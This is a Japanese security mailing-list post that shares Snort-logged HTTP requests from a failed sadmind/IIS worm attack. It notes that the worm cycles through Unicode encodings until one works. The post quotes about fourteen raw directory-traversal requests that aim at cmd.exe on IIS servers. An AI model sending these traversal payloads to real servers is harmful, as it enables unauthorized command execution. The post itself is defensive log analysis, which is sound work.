[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[stalk:00412] sadmind and IIS worm の残した痕跡



    「辞書買うのもったいないし、いちいち辞書めくるの面倒だな〜」    

            そんな時はインフォシーク!            
    「英和辞典」「和英辞典」「国語辞典」サービスはじめました。    
          http://jiten.infoseek.co.jp/?svx=971128         
------------------------------------------------------------------------


犬のみっきーです。

sadmind/IIS wormによる IIS への攻撃をsnortが検出して記録し
ていたので、HTTPリクエストの部分を切り出してみました。

これは攻撃に失敗した物ですが、成功した物とも比べてみました
ところ、かたっぱしからunicodeを試してみて、反応の返ってきた
コードを使って次の攻撃に移るようです。

まったく迷惑なヤツだ。

GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0....
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0....
GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0....
GET /scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir HTTP/1.0....
GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir HTTP/1.0....
GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0....
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0....
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0....
GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0....
GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0....
GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0....
GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0....
GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0....
GET
/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
HTTP/1.0....

>----- みっきーのネットワーク研究所 -----<
>  http://www.hawkeye.ac/micky           <
>  所長:犬のみっきー <micky@xxxxxxxxx>  <
>----------------------------------------<

--
- このメイリングリストに関する質問・問い合せ等は
- <security-talk@xxxxxxxxxx>までお知らせください
--
------------------------------------------------------------------------
           ふとした疑問ありますか?           
   http://www.infoseek.co.jp/GHome?pg=gn_top.html&svx=971122